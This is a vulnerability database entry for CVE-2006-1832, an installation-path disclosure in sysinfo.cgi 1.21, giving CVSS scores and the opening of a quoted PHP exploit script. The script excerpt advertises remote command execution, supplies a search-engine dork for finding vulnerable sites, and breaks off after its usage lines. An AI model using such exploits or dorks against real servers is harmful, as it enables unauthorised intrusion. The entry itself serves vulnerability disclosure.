5
CVSSv2

CVE-2006-1832

Published: 19/04/2006 Updated: 19/10/2017
CVSS v2 Base Score: 5 | Impact Score: 2.9 | Exploitability Score: 10
VMScore: 505
Vector: AV:N/AC:L/Au:N/C:P/I:N/A:N

Vulnerability Summary

sysinfo.cgi in sysinfo 1.21 allows remote malicious users to obtain the installation path via the debugger action.

Vulnerable Product Search on Vulmon Subscribe to Product

coder-world sysinfo 1.21

Exploits

#!/usr/bin/php -q -d short_open_tag=on <? echo "sysinfocgi 121 remote cmmnds xctn \r\n"; echo "by rgod rgod@autisticiorg\r\n"; echo "site: retrogodaltervistaorg\r\n\r\n"; echo "dork: inurl:sysinfocgi ext:cgi\r\n\r\n"; if ($argc<4) { echo "Usage: php "$argv[0]" host path cmd OPTIONS\r\n"; echo "host: target server (ip/host ...